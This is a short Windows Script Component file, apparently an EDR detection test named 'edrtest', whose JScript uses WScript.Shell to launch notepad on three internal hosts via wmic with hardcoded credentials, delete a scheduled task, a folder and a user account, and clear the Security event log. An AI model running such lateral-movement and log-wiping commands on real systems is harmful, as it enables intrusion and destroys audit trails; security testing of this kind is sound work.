<?xml version="1.0"?>

<package>
<component id="edrtest">

<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd /c wmic /node:192.168.173.240 /user:demo /password:1234 process call create notepad.exe");
var r = new ActiveXObject("WScript.Shell").Run("cmd /c wmic /node:192.168.173.241 /user:demo /password:1234 process call create notepad.exe");
var r = new ActiveXObject("WScript.Shell").Run("cmd /c wmic /node:192.168.173.242 /user:demo /password:1234 process call create notepad.exe");
var r = new ActiveXObject("WScript.Shell").Run("cmd /c schtasks /delete /tn edrtesttask1 /F"); 
var r = new ActiveXObject("WScript.Shell").Run("cmd /c rd c:\\edrtest /s /q");
var r = new ActiveXObject("WScript.Shell").Run("cmd /c net user /del sh123");
var r = new ActiveXObject("WScript.Shell").Run("cmd /c wevtutil cl Security");
]]>
</script>

</component>
</package>
